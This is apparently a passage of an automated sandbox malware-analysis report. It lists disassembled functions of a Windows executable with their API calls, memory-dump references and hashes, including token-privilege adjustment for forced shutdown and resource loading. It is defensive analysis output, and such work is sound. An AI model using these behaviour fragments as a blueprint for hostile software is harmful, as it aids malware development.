                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004074D8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                            • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040693C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                            • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                            • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                            • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407628 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                            • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                            • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                            • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004071E4 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                            • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                            • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                            • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040760C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEndOfFile.KERNEL32(?,02138000,00409F6B,00000000), ref: 00407613
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 734332943-0
                                                                            • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                            • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                            • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                            • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                            • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                            • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                            • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F77 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                            • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                            • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                            • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrev
                                                                            • String ID:
                                                                            • API String ID: 122130370-0
                                                                            • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                            • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407DFC Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                            • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                            • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                            • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004074A8 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                            • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                            • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                            • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407DA4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                            • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                            • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                            • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0040936C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 107509674-3733053543
                                                                            • Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                            • Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
                                                                            • Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                            • Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409AD0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                            • Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
                                                                            • Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                            • Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004051A8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                            • Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
                                                                            • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                            • Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: SystemTime
                                                                            • String ID:
                                                                            • API String ID: 2656138-0
                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C44 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                            • Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
                                                                            • Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                            • Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408330 Relevance: .5, Instructions: 545COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                            • Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
